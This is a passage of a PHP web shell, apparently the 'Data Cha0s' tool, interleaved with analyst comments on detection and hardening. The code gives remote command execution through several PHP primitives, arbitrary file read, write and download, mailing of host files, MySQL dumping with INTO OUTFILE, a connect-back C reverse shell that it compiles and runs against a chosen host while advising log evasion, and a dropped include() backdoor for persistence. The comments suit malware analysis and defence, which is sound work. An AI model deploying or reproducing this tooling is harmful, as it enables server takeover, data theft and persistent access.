	global $SCRIPT_FILENAME; 
	global $QUERY_STRING; 
	global $SCRIPT_URI; 
	global $SERVER_NAME; 
	$_igr = ini_get('register_globals'); 
	if ($_igr == '' OR $_igr == 'Off' OR $_igr == 0) import_request_variables('GPC'); 
	if (phpversion() <= '4.1.0') { 
		$REQUESTS = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS);  
	} else { 
		$REQUESTS = $_REQUEST; 
	} 
	if($_SERVER['PHP_SELF']=="") { 
		$SERVER_NAME     = $HTTP_SERVER_VARS['SERVER_NAME']; 
		$SCRIPT_URI      = $HTTP_SERVER_VARS['SCRIPT_URI']; 
		$REMOTE_ADDR     = $HTTP_SERVER_VARS['REMOTE_ADDR']; 
		$QUERY_STRING    = $HTTP_SERVER_VARS['QUERY_STRING']; 
		$PHP_SELF        = $HTTP_SERVER_VARS['PHP_SELF']; 
		$SCRIPT_FILENAME = $HTTP_SERVER_VARS['SCRIPT_FILENAME']; 
	} else { 
		$SERVER_NAME     = $_SERVER['SERVER_NAME']; 
		$SCRIPT_URI      = $_SERVER['SCRIPT_URI']; 
		$REMOTE_ADDR     = $_SERVER['REMOTE_ADDR']; 
		$QUERY_STRING    = $_SERVER['QUERY_STRING']; 
		$PHP_SELF        = $_SERVER['PHP_SELF']; 
		$SCRIPT_FILENAME = $_SERVER['SCRIPT_FILENAME']; 
	} 
} 
 
# Prints the contents of the array whose NAME is passed in $v; the dumpvars
# feature calls it with "GLOBALS". Keys listed in $DebugArr (the tool's own
# variables) are skipped, nested arrays are followed recursively, and every
# other key/value pair is echoed. Since the tool runs inside the including
# page's global scope, the dump can contain that application's configuration
# values.
# Output is echoed directly; the function returns nothing and $rv is not used
# after it is assigned.
# each() was removed in PHP 8.0, another sign of the PHP 4/5 target.
function dd($v) { 
	global $DebugArr; 
	$rv = "<blockquote>
"; 
	# The loop is assembled as PHP source text with $v spliced in as a
	# variable name, then executed through eval().
	$q="while(list(\$key,\$val) = each(\$$v)) {". 
	' if(array_search($key, $DebugArr)) {'. 
	' } else if((is_array($val)) && ($key!="GLOBALS")) {'. 
	'  echo "<b>$key</b>>><br/>";'. 
	'  @dd($v."[".$key."]");'. 
	' } else if($key=="GLOBALS") {'. 
	' } else echo "<b>$key</b>=>$val<br/>";'. 
	'};'; 
	eval($q); 
	echo "</blockquote>
"; 
} 
 
# Variant of dd() used by the debugscript feature (called with "DebugArr"):
# same eval()-built loop over the array named by $v, but without the
# $DebugArr filter. Nested arrays are handed to dd(), not to ddb().
# Echoes its output and returns nothing.
function ddb($v) { 
	echo "<blockquote>
"; 
	$q="while(list(\$key,\$val) = each(\$$v)) {". 
	' if((is_array($val)) && ($key!="GLOBALS")) {'. 
	'  echo "<b>$key</b>>><br/>";'. 
	'  @dd($v."[".$key."]");'. 
	' } else if($key=="GLOBALS") {'. 
	' } else echo "<b>$key</b>=>$val<br/>";'. 
	'};'; 
	eval($q); 
	echo "</blockquote>
"; 
} 
 
###################################################################### 
# cmd shell functions 
###################################################################### 
# test what cmd is working 
# Probes the execution primitives in the order 5, 4, 3, 2, 1 by running `pwd`
# through Mexec() and returns the first index that produced output, or 0.
# The index matches the labels in $Mstr.
# Methods 5, 4 and 3 wrap their result in <pre></pre> (11 characters), hence
# the "> 11" test; methods 2 and 1 are tested for a non-empty return value.
# Host-side trace: up to five `pwd` child processes of the PHP / web-server
# process for a single page load.
function test_cmd_shell(){ 
	if(strlen(Mexec("pwd", 5))>11)     $var = 5; 
	elseif(strlen(Mexec("pwd", 4))>11) $var = 4; 
	elseif(strlen(Mexec("pwd", 3))>11) $var = 3; 
	elseif(strlen(Mexec("pwd", 2))>0) $var = 2; 
	elseif(strlen(Mexec("pwd", 1))>0) $var = 1; 
	else $var = 0; 
	return $var; 
} 
# function for executing cmds 
# Passes $Mcmd unchanged to a shell through the primitive selected by $type:
#   5 exec(), 4 proc_open(), 3 backtick operator, 2 system(), 1 passthru().
# Types 5, 4 and 3 collect the command's output and return it wrapped in
# <pre>. Types 2 and 1 let the command write straight into the response and
# return whatever system() / passthru() returned. Any other type returns a
# fixed "no execute functions" message. An empty $Mcmd returns nothing.
# Hardening: every branch is closed by a disable_functions entry - exec,
# proc_open, shell_exec (which also disables the backtick operator), system
# and passthru.
function Mexec($Mcmd, $type) { 
	if($Mcmd != ""){ 
		# Descriptor spec for the proc_open() branch only.
		$dspec = array( 
			0 => array("pipe", "r"), 
			1 => array("pipe", "w"), 
			2 => array("pipe", "r") 
		); 
		$output = ""; 
		switch($type) { 
			case 5: 
				$output .= "<pre>"; 
				$lastline = exec($Mcmd, $arrOutput); 
				foreach($arrOutput as $val) { 
					$output .= $val . "
"; 
				} 
				$output .= "</pre>"; 
				break; 
			case 4: 
				$proc = proc_open($Mcmd, $dspec, $pipes); 
				if (is_resource($proc)) { 
					$output .= "<pre>"; 
					# stdin is closed at once; only pipe 1 (stdout) is read.
					fclose($pipes[0]); 
					while(!feof($pipes[1])) { 
						$tmp = fgets($pipes[1], 1024); 
						$output .= $tmp; 
					} 
					$output .= "</pre>"; 
				} 
				break; 
			case 3; 
				$output .= "<pre>"; 
				$output .= `$Mcmd`; 
				$output .= "</pre>"; 
				break; 
			case 2; 
				print "<pre>
"; 
				$output = system($Mcmd); 
				print "</pre>
"; 
				break; 
			case 1; 
				print "<pre>
"; 
				$output = passthru($Mcmd); 
				print "</pre>
"; 
				break; 
			case 0; 
			default; 
				$output = "There are no execute functions available!"; 
				break; 
		} 
		return $output; 
	}	 
} 
# Builds a multipart/mixed MIME message by hand and sends it with mail().
# $attach_source is opened with fopen(), so it may be a local path or, where
# URL wrappers are enabled, a URL; its bytes are base64-encoded into the
# attachment part. In effect any file readable by the PHP process can be
# mailed off the host through the server's own mail setup.
# All fields come from the request and are placed into the header block
# without any filtering.
# The whole message, text part included, is passed as the additional-headers
# argument of mail(); the message argument is the empty string.
# Returns a prompt when $msg or $subject is empty, otherwise a status string
# that echoes the complete header block.
# Detection: mail submitted by the web-server account with a multipart/mixed
# boundary made of 32 hex characters (an md5 digest) and no quoting.
function drop_mime_mail($from,$to,$subject,$attach_source,$content_type,$attach_appear,$msg) { 
	$msgerror = ""; 
	if($msg == "") $msgerror = "please enter a message"; 
	elseif($subject == "") $msgerror = "please enter a subject"; 
	else { 
		# MIME boundary: md5 of a time-based unique id.
		$stlf = md5(uniqid(time()));  
		$attach = ""; 
		$fp = fopen($attach_source, "rb");  
		if($fp) while(!feof($fp)) { $attach = $attach . fread($fp, 1024); }  
		$header = "From: $from
";  
		$header .= "MIME-Version: 1.0
";  
		$header .= "Content-Type: multipart/mixed; boundary=$stlf

";  
		$header .= "This is a multi-part message in MIME format
";  
		$header .= "--$stlf
";  
		$header .= "Content-Type: text/plain
";  
		$header .= "Content-Transfer-Encoding: 8bit

";  
		$header .= "$msg
";  
		$header .= "--$stlf
";  
		$header .= "Content-Type: $content_type; name=$attach_appear
";  
		$header .= "Content-Transfer-Encoding: base64
";  
		$header .= "Content-Disposition: attachment; filename=$attach_appear

";  
		$header .= chunk_split(base64_encode($attach));  
		$header .= "
";  
		$header .= "--$stlf--";  
		mail($to,$subject,"",$header);  
		$msgerror = "send done - show header: <br>
<pre>$header</pre> "; 
	}  
	return $msgerror; 
} 
 
###################################################################### 
# system browsing 
###################################################################### 
 
# Renders one navigation entry for the feature named $val: the feature name,
# coloured green when the request currently has it set to 1 and black
# otherwise, followed by a link that flips the value. The link is built from
# $MyLoc and the accumulated query string $SREQ plus "<feature>=<0|1>".
# Returns the HTML fragment as a string.
function make_switch($val){ 
	global $txt; 
	global $lang; 
	global $SCRIPT_NAME,$SREQ,$_REQUEST,$MyLoc,$_SERVER; 
	if(isset($_REQUEST[$val]) AND $_REQUEST[$val] == 1) { $test = 0; $col = "green"; $sw = $txt[$lang]['off']; } 
	else { $test = 1; $col = "black"; $sw = $txt[$lang]['on']; } 
	return " <font color=$col>$val</font> <a target=\"_parent\" href=\"".$MyLoc."?".$SREQ."&".$val."=".$test."\">[ ". $sw." ]</a> "; 
} 
# No-op in this copy of the tool: the only statement, a syslog() call, is
# commented out, so nothing is ever written to syslog by this function.
function drop_syslog_warning($msg) { 
	global $syslog; 
#	if($syslog == 1) syslog(LOG_WARNING,$msg); 
} 
 
###################################################################### 
# file functions 
###################################################################### 
# Copies $source to $dest with copy(). Both values come from the request;
# $source can be a URL where URL wrappers are enabled, which makes this the
# tool's download-to-disk feature.
# Before copying, the PHP user_agent setting is changed to the literal
# "m0ins downloader". PHP sends that value as the User-Agent header of its
# own HTTP fetches, so the string is a usable indicator in proxy and
# web-server logs.
# The function has no return statement: the caller concatenates nothing, and
# an empty result cell does not mean that no file was written.
# Hardening: allow_url_fopen off, egress filtering, and a web root that the
# PHP process cannot write to.
function copy_file($source,$dest) { 
	$dataout = ""; 
	if($source == "")  $dataout .= "enter source<br>
"; 
	if($dest != "") { 
		ini_set("user_agent","m0ins downloader"); 
		if(!copy($source, $dest)) $dataout . "failed to copy ...<br>
"; 
		if(file_exists($dest)) $dataout .= highlight_file($dest, 1); 
	} else { 
		$dataout .= "enter destination"; 
	} 
} 
# Overwrites an existing file with request-supplied content.
#   $cont  new file content
#   $dest  path of the file; the function only acts on paths that exist
#   $do    1 to write, anything else to only display the file
# With $do == 1 the file is opened in "w" mode (truncating it) and $cont is
# written, after stripslashes() when magic_quotes_gpc is on. In every case
# where the file exists the return value ends with the syntax-highlighted
# current content of the file; otherwise an "unable to open" message.
# Detection: file-integrity monitoring on the web root catches the rewrite of
# existing application files.
function edit_file($cont,$dest,$do) { 
	$dataout = ""; 
	global $magic_quotes_gpc; 
	if(file_exists($dest)) { 
		if($do == 1){ 
			$fh = fopen($dest, "w");		 
			if(!$fh) { 
				$dataout .= "unable to open <b>$dest</b>.
"; 
			} else { 
#				$cont = str_replace("&gt;", ">", str_replace("&lt;", "<", $cont)); 
				if($magic_quotes_gpc == 1) $cont = stripslashes($cont); 
				$write = fwrite($fh, $cont); 
				fclose($fh); 
			} 
		} 
		$dataout .= highlight_file($dest, 1); 
	} else { 
		$dataout .= "unable to open <b>$dest</b>.
"; 
	} 
	return $dataout; 
} 
# Reads the whole file at $source and returns its content with "<" and ">"
# replaced by HTML entities, for display inside the edit form's textarea.
# Returns an "unable to open" message when the path does not exist or cannot
# be opened. $source comes from the request, so this is an arbitrary file
# read bounded only by the PHP process's permissions and open_basedir.
function show_file($source) { 
	$dataout = ""; 
	if(file_exists($source)) { 
		$fh = fopen($source, "r"); 
		if(!$fh) { 
			$dataout .= "unable to open <b>$source</b>.
"; 
		} else { 
			$read = fread($fh, filesize($source)); 
			fclose($fh); 
			if(!empty($read)) $read = str_replace(">", "&gt;", str_replace("<", "&lt;", $read)); 
			$dataout .= $read; 
		} 
	} else { 
		$dataout .= "unable to open <b>$source</b>.
"; 
	} 
	return $dataout; 
} 
# snoopy: list directory $chdir and return an HTML table of its entries.
# Entries are appended to the global arrays $is_file, $is_dir, $is_w_dir and
# $is_w_file, which echo_files() then renders as four table columns.
# Returns "Permission denied." when opendir() does not yield a handle.
# Defender note: the writable-file / writable-directory columns are the
# reconnaissance output here -- they show where the web server account can
# write.
function snoopy($chdir){ 
	$tmpOut = ""; 
	global $is_file,$is_dir,$is_w_dir,$is_w_file; 
	$fh = opendir("$chdir"); 
	if($fh!="") { 
		while (false !== ($filename = readdir($fh)) ) { 
			$FN = $chdir."/".$filename; 
			if(@is_file($FN)) $is_file[] = $filename; 
			if(@is_dir($FN))  $is_dir[] = $filename; 
			# the type test in the next two lines uses the bare $filename (no $chdir prefix)
			if(@is_writable($FN) && @is_dir($filename))  $is_w_dir[] = $filename; 
			if(@is_writable($FN) && @is_file($filename)) $is_w_file[] = $filename; 
		} 
		$tmpOut .=  "<table border=1 cellspacing=1 cellpadding=0><tr>"; 
		$tmpOut .= echo_files($is_file,  "all files"); 
		$tmpOut .= echo_files($is_dir,   "only dirs"); 
		$tmpOut .= echo_files($is_w_dir, "writable dirs"); 
		$tmpOut .= echo_files($is_w_file,"writable files"); 
		$tmpOut .= "</tr></table>"; 
	} else { 
		$tmpOut .= "Permission denied."; 
	} 
	# reached on both branches, including the one where opendir() failed
	closedir($fh); 
	return $tmpOut; 
} 
 
# echo_files: render one table cell listing the names in $arr under the
# heading $txt.
# Each name is resolved against the global $chdir and shown as
# "owner - perms - link", where owner is the fileowner() value and perms the
# last three octal digits of fileperms().
# Colour coding: red = writable file or directory, green = other file,
# blue = other directory. Directory links set chdir=, file links set
# snoop=0&vsource= on the script's own URL ($MyLoc?$SREQ).
# File names and paths are interpolated into the HTML without escaping.
function echo_files($arr,$txt){ 
	$tmpOutMF = ""; 
	global $chdir,$MyLoc,$SREQ; 
	$tmpOutMF .= "<td valign=top>"; 
	$tmpOutMF .= "<b><font size=2 face=arial>$txt</b> <br><br>"; 
	if(count($arr) > 0) { 
		foreach($arr as $key => $file) { 
			$FN = $chdir."/".$file; 
			$owner = fileowner($FN); 
			# keep only the permission bits, e.g. "755"
			$perms = substr(sprintf("%o",fileperms($FN)),-3); 
			if(@is_writable($FN) && @is_dir($FN))  $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>"; 
			elseif(@is_writable($FN) && @is_file($FN)) $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a> </font><br>"; 
			elseif(@is_file($FN)) $tmpOutMF .=  "<font color=green>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a></font><br>";  
			elseif(@is_dir($FN))  $tmpOutMF .=  "<font color=blue>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>"; 
		} 
	} 
    $tmpOutMF .=  "</td>"; 
    return $tmpOutMF; 
} 
# print_globals: echo the key/value pairs of the variable whose name is given
# in $v, recursing into nested arrays (the "GLOBALS" key is not followed).
# The loop is assembled as a PHP source string and run through eval(), with
# $v concatenated into that source unescaped.
# NOTE(review): eval() on a string built from a parameter -- whatever reaches
# $v is executed as code. The generated loop relies on each(), which was
# removed in PHP 8.
function print_globals($v) { 
	global $a; 
	echo "<blockquote>
"; 
	# generated source: while(list($key,$val) = each($<name>)) { echo ...; recurse on arrays }
	$q= "while(list(\$key,\$val) = each($".$v. ") ) { ". 
	" echo \"<b>\$key</b>=>\$val.<br>\"; ". 
	" if(( is_array(\$val)) && (\$key != \"GLOBALS\")) {". 
	" @print_globals( \$v.\"[\".\$key.\"]\" );". 
	"}}"; 
	eval($q); 
	echo "</blockquote>
"; 
} 
###################################################################### 
# connect back shell function 
###################################################################### 
 
function connect_back($tmp_dir, $compiler, $host, $port) { 
    $shell = "#include <stdio.h>
" . 
             "#include <sys/socket.h>
" . 
             "#include <netinet/in.h>
" . 
             "#include <arpa/inet.h>
" . 
             "#include <netdb.h>
" . 
             "int main(int argc, char **argv) {
" . 
             "  char *host;
" . 
             "  int port = 80;
" . 
             "  int f;
" . 
             "  int l;
" . 
             "  int sock;
" . 
             "  struct in_addr ia;
" . 
             "  struct sockaddr_in sin, from;
" . 
             "  struct hostent *he;
" . 
             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\n\n\"
" . 
             "                \"Issue \\"export TERM=xterm; exec bash -i\\"\n\"
" . 
             "                \"For More Reliable Shell.\n\"
" . 
             "                \"Issue \\"unset HISTFILE; unset SAVEHIST\\"\n\"
" . 
             "                \"For Not Getting Logged.\n(;\n\n\";
" . 
             "  printf(\"Data Cha0s Connect Back Backdoor\n\n\");
" . 
             "  if (argc < 2 || argc > 3) {
" . 
             "    printf(\"Usage: %s [Host] <port>\n\", argv[0]);
" . 
             "    return 1;
" . 
             "  }
" . 
             "  printf(\"[*] Dumping Arguments\n\");
" . 
             "  l = strlen(argv[1]);
" . 
             "  if (l <= 0) {
" . 
             "    printf(\"[-] Invalid Host Name\n\");
" . 
             "    return 1;
" . 
             "  }
" . 
             "  if (!(host = (char *) malloc(l))) {
" . 
             "    printf(\"[-] Unable to Allocate Memory\n\");
" . 
             "    return 1;
" . 
             "  }
" . 
             "  strncpy(host, argv[1], l);
" . 
             "  if (argc == 3) {
" . 
             "    port = atoi(argv[2]);
" . 
             "    if (port <= 0 || port > 65535) {
" . 
             "      printf(\"[-] Invalid Port Number\n\");
" . 
             "      return 1;
" . 
             "    }
" . 
             "  }
" . 
             "  printf(\"[*] Resolving Host Name\n\");
" . 
             "  he = gethostbyname(host);
" . 
             "  if (he) {
" . 
             "    memcpy(&ia.s_addr, he->h_addr, 4);
" . 
             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
" . 
             "    printf(\"[-] Unable to Resolve: %s\n\", host);
" . 
             "    return 1;
" . 
             "  }
" . 
             "  sin.sin_family = PF_INET;
" . 
             "  sin.sin_addr.s_addr = ia.s_addr;
" . 
             "  sin.sin_port = htons(port);
" . 
             "  printf(\"[*] Connecting...\n\");
" . 
             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
" . 
             "    printf(\"[-] Socket Error\n\");
" . 
             "    return 1;
" . 
             "  }
" . 
             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
" . 
             "    printf(\"[-] Unable to Connect\n\");
" . 
             "    return 1;
" . 
             "  }
" . 
             "  printf(\"[*] Spawning Shell\n\");
" . 
             "  f = fork( );
" . 
             "  if (f < 0) {
" . 
             "    printf(\"[-] Unable to Fork\n\");
" . 
             "    return 1;
" . 
             "  } else if (!f) {
" . 
             "    write(sock, msg, sizeof(msg));
" . 
             "    dup2(sock, 0);
" . 
             "    dup2(sock, 1);
" . 
             "    dup2(sock, 2);
" . 
             "    execl(\"/bin/sh\", \"shell\", NULL);
" . 
             "    close(sock);
" . 
             "    return 0;
" . 
             "  }
" . 
             "  printf(\"[*] Detached\n\n\");
" . 
             "  return 0;
" . 
             "}
"; 
    $fbname = $tmp_dir . "/cbs"; 
	$fp = fopen($fbname . ".c", "w"); 
	$write = fwrite($fp, $shell); 
	fclose($fp); 
	if(!empty($write)) { 
		$command = $compiler . " -o " . $fbname . " " . $fbname . ".c"; 
		$execM = test_cmd_shell(); 
		if($execM > 0) { 
			$rtval = Mexec($command, $execM); 
			$command = $fbname . " " . $host . " " . $port; 
			$rtval .= Mexec($command, $execM); 
			return "<pre>" . $rtval . "</pre>"; 
		} else { 
			return "<b>ERROR! No EXEC Avilable!</b>"; 
		} 
		 
	} else { 
		return "<b>ERROR! Writing data!</b>"; 
	} 
} 
 
###################################################################### 
# drop mini inc hole 
###################################################################### 
# dropminiinc: write a small PHP file to $location and report the outcome.
# The written file collects the request variables (GET+POST merged on old
# PHP, $_REQUEST otherwise) and passes the request parameter "inc" straight
# to include() -- i.e. it leaves a second, much smaller file-inclusion
# backdoor behind that survives removal of this script.
# Defender note: when cleaning up after this tool, also search the web root
# for short PHP files whose body is an include() of a request value; the
# default location set elsewhere in this script is getcwd() . "/miniinc.php".
# Returns an HTML status string. The file handle is not closed here.
function dropminiinc($location) { 
	$Scode = "<?php
". 
		"if (phpversion() <= '4.1.0') \$vars = array_merge(\$HTTP_GET_VARS, \$HTTP_POST_VARS);
". 
		"else \$vars = \$_REQUEST;
". 
		"include(\$vars[inc]);
". 
		"?>
"; 
	$fp = fopen($location, "w"); 
	$write = fwrite($fp, $Scode); 
	# fwrite() yields the byte count; empty() treats 0 and false alike as failure
	if(!empty($write)) return "<b>$location</b> copied
"; 
	else return "<b>ERROR! Not copied!</b>"; 
} 
 
###################################################################### 
# db functions 
# unchanged from dans code 
###################################################################### 
# prep_rows: render a mysql_* result set as an HTML table.
# The first row holds the field names, followed by one row per record.
# Field names and values are written into the markup without HTML escaping.
# Uses the legacy mysql_* extension, which was removed in PHP 7.
function prep_rows($myresult) { 
	$dataout = "<table>
"; 
	$num_fields = mysql_num_fields($myresult); 
	$dataout .= "<tr border=1>
"; 
	# header row: one cell per column name
	for($i=0; $i<$num_fields; $i++) $dataout .= "<td>" . mysql_field_name($myresult, $i) . "</td>"; 
	$dataout .= "</tr>
"; 
	while ($line = mysql_fetch_array($myresult, MYSQL_ASSOC)) { 
		$dataout .= "<tr>
"; 
		foreach($line as $colvalue) { 
			$dataout .= "<td>$colvalue</td>
"; 
		} 
	$dataout .= "</tr>
"; 
	} 
	$dataout .= "</table>
"; 
	return $dataout; 
} 
 
# dump_rows: export every row of $mytable to the file $mydump using
# "SELECT * ... INTO OUTFILE".
# The table name and file path are concatenated into the statement as given.
# None of the connect / select / query results is checked, so the fixed
# string "Hopefully dumped!" is returned whether or not anything was written.
# Defender note: INTO OUTFILE makes the database server itself write the
# file; it needs the MySQL FILE privilege and is constrained by the server's
# secure_file_priv setting, so application accounts should hold neither
# FILE nor an unrestricted export directory.
function dump_rows($myhost, $myuser, $mypass, $mydb, $mytable, $mydump) { 
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	mysql_select_db($mydb); //  or return "Could not select database"; 
	$query = "SELECT * FROM ".$mytable." INTO OUTFILE \"".$mydump."\";"; 
	$result = mysql_query($query); // or return "Query failed: ".mysql_error(); 
	mysql_free_result($result); 
	mysql_close($link); 
	return "Hopefully dumped!"; 
} 
 
# dump_query: run the caller-supplied statement $mysql with
# " INTO OUTFILE <$mydump>" appended, so its result is written to a file by
# the database server.
# $mysql and $mydump are concatenated into the statement as given; no result
# is checked and "Hopefully dumped!" is always returned.
# Defender note: same exposure as any INTO OUTFILE use -- it depends on the
# account holding the MySQL FILE privilege and on secure_file_priv.
function dump_query($myhost, $myuser, $mypass, $mydb, $mysql, $mydump) { 
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	mysql_select_db($mydb); //  or return "Could not select database"; 
	$query = $mysql." INTO OUTFILE \"".$mydump."\";"; 
	$result = mysql_query($query); // or return "Query failed: ".mysql_error(); 
	mysql_free_result($result); 
	mysql_close($link); 
	return "Hopefully dumped!"; 
} 
 
# display_query: connect with the given credentials, run the caller-supplied
# statement $mysql unchanged and return its result as an HTML table built by
# prep_rows().
# Connection, database selection and query results are not checked before
# they are used.
function display_query($myhost, $myuser, $mypass, $mydb, $mysql) { 
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	mysql_select_db($mydb); //  or return "Could not select database"; 
	$query = $mysql; 
	$result = mysql_query($query); // or return "Query failed: ".mysql_error(); 
	$dataouted = prep_rows($result); 
	mysql_free_result($result); 
	mysql_close($link); 
	return($dataouted); 
} 
 
# display_rows: connect with the given credentials, run
# "SELECT * FROM <$mytable>" and return the rows as an HTML table built by
# prep_rows().
# The table name is concatenated into the statement as given, and no
# connection or query result is checked.
function display_rows($myhost, $myuser, $mypass, $mydb, $mytable) { 
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	mysql_select_db($mydb); //  or return "Could not select database"; 
	$query = "SELECT * FROM ".$mytable; 
	$result = mysql_query($query); // or return "Query failed: ".mysql_error(); 
	$dataouted = prep_rows($result); 
	mysql_free_result($result); 
	mysql_close($link); 
	return($dataouted); 
} 
 
# display_tables: list the tables of database $mydb as an HTML table of links.
# Each link points back at the script ($MyLoc?$SREQ) and carries the
# connection details as query parameters: incdbhost, incdbuser, incdbpass,
# incdbname and incdbtable.
# Defender note: because the database password travels in the URL
# (incdbpass=...), use of this panel leaves the credentials in web server
# access logs and any intermediary that records request lines; those
# parameter names are searchable indicators, and any password found this way
# should be treated as compromised and rotated.
# Returns an error string when the table list cannot be obtained.
function display_tables($myhost, $myuser, $mypass, $mydb) { 
	global $MyLoc,$SREQ; 
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	$result = mysql_list_tables($mydb); 
	if (!$result) { 
		return "DB Error, could not list tables"; 
	} 
	$dataout = "<table>
"; 
	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) { 
		$dataout .= "<tr>
"; 
		foreach ($line as $col_value) { 
			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$mydb&incdbtable=$col_value'>$col_value</a></td>
"; 
		} 
	$dataout .= "</tr>
"; 
	} 
	$dataout .= "</table>
"; 
	mysql_free_result($result); 
	mysql_close($link); 
	return($dataout); 
} 
 
# display_dbs: list the databases visible to the given account as an HTML
# table of links.
# Each link points back at the script ($MyLoc?$SREQ) with incdbhost,
# incdbuser, incdbpass and incdbname as query parameters.
# Defender note: the database password is placed in the URL (incdbpass=...),
# so it ends up in web server access logs; treat any credential seen there
# as compromised.
# Returns an error string when the database list cannot be obtained.
function display_dbs($myhost, $myuser, $mypass) { 
	global $MyLoc,$SREQ; 
	$link = mysql_connect($myhost, $myuser, $mypass); 
	$result = mysql_list_dbs($link); 
	if (!$result) { 
		return "DB Error, could not list databases"; 
	} 
	$dataout = "<table>
"; 
	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) { 
		$dataout .= "<tr>
"; 
		foreach ($line as $col_value) { 
			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'>$col_value</a></td>
"; 
		} 
	$dataout .= "</tr>
"; 
	} 
	$dataout .= "</table>
"; 
	mysql_free_result($result); 
	mysql_close($link); 
	return($dataout); 
} 
 
# Odisplay_rows: ODBC counterpart of display_rows(): connect to the data
# source $myhost, run "SELECT * FROM <$mytable>" and build an HTML table.
# $mydb is accepted but not used in the body. The table name is concatenated
# into the statement as given.
# NOTE(review): the loop treats the value of odbc_fetch_row() as a row array
# and passes the MySQL constant MYSQL_ASSOC to it; whether this path ever
# produced rows is doubtful -- confirm before relying on it in analysis.
function Odisplay_rows($myhost, $myuser, $mypass, $mydb, $mytable) { 
	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	$query = "SELECT * FROM ".$mytable; 
	$result = odbc_exec($link, $query); // or return "Query failed: ".mysql_error(); 
	$dataout = "<table>
"; 
	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) { 
		$dataout = $dataout . "<tr>
"; 
		foreach($line as $colvalue) { 
			$dataout = $dataout . "<td>$colvalue</td>
"; 
		} 
	$dataout = $dataout . "</tr>
"; 
	} 
	$dataout = $dataout . "</table>
"; 
	return($dataout); 
} 
 
# Odisplay_tables: ODBC counterpart of display_tables(): connect to the data
# source $myhost, call odbc_tables() and build an HTML table from entries
# whose fourth result column equals "TABLE".
# Returns an error string when odbc_tables() yields no result.
# NOTE(review): $tablelist is read below but never assigned in this function.
function Odisplay_tables($myhost, $myuser, $mypass) { 
	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	$result = odbc_tables($link); 
	if (!$result) { 
		return "DB Error, could not list tables"; 
	} 
	$dataout = "<table>
"; 
	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) { 
		if(odbc_result($line, 4) == "TABLE") { 
			$dataout = $dataout . "<tr>
"; 
			$dataout = $dataout . "<td>" . odbc_result($tablelist, 3) ."</td>
";  
		} 
		$dataout = $dataout . "</tr>
"; 
	} 
	$dataout = $dataout . "</table>
"; 
	return($dataout); 
} 
 
###################################################################### 
# Dan's Network function Wrappers 
# Initial use inside this script, need to handle the error data  
# differently to get it included in the base 64 output! 
###################################################################### 
 
# DB_NET_GET_SOCKET_PROTOCOL: map a protocol name to the constants needed by
# socket_create().
#   "udp"            -> array(SOL_UDP, SOCK_DGRAM)
#   "tcp" / anything -> array(SOL_TCP, SOCK_STREAM)
# Returns array($protocol, $socktype).
function DB_NET_GET_SOCKET_PROTOCOL($prot) { 
	switch($prot) { 
		case "udp": 
			$protocol = SOL_UDP; 
			$socktype = SOCK_DGRAM; 
		break; 
		case "tcp": 
		default: 
			$protocol = SOL_TCP; 
			$socktype = SOCK_STREAM; 
		break; 
	} 
	return(array($protocol, $socktype)); 
} 
 
# DB_NET_CONNECT: resolve $hostname and open an outbound socket to it.
#   $hostname  name or address, resolved with gethostbyname()
#   $port      destination port (default 80)
#   $prot      "udp" or "tcp" (default "tcp")
# Returns the socket. Failures are only echoed, and only when the return
# value compares below zero; the socket is returned in every case.
function DB_NET_CONNECT($hostname, $port=80, $prot="tcp") { 
	$address = gethostbyname($hostname); 
	list($protocol, $socktype) = DB_NET_GET_SOCKET_PROTOCOL($prot); 
	# repeats the mapping already obtained from the helper on the line above
	switch($prot) { 
		case "udp": 
			$protocol = SOL_UDP; 
			$socktype = SOCK_DGRAM; 
		break; 
		case "tcp": 
		default: 
			$protocol = SOL_TCP; 
			$socktype = SOCK_STREAM; 
		break; 
	} 
	$socket = socket_create(AF_INET, $socktype, $protocol); 
	if ($socket < 0) { 
		echo "socket_create() failed: reason: " . socket_strerror($socket) . "
"; 
	} 

	$result = socket_connect($socket, $address, $port); 
	if ($result < 0) { 
		echo "socket_connect() failed.
Reason: ($result) " . socket_strerror($result) . "
"; 
	} 
	return $socket; 
} 
 
# DB_NET_LISTEN: create a TCP socket, bind it to $address:$port and start
# listening with a backlog of 5.
# Returns the listening socket, or -1 / -2 / -3 when the create / bind /
# listen step reports a value below zero (the reason is echoed first).
# Defender note: a web server worker opening a new listening port is unusual
# on its own and is visible in socket listings and host firewall logs.
function DB_NET_LISTEN($address, $port) { 
	if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) { 
		echo "socket_create() failed: reason: " . socket_strerror($sock) . "
"; 
		return(-1); 
	} 

	if (($ret = socket_bind($sock, $address, $port)) < 0) { 
		echo "socket_bind() failed: reason: " . socket_strerror($ret) . "
"; 
		return(-2); 
	} 

	if (($ret = socket_listen($sock, 5)) < 0) { 
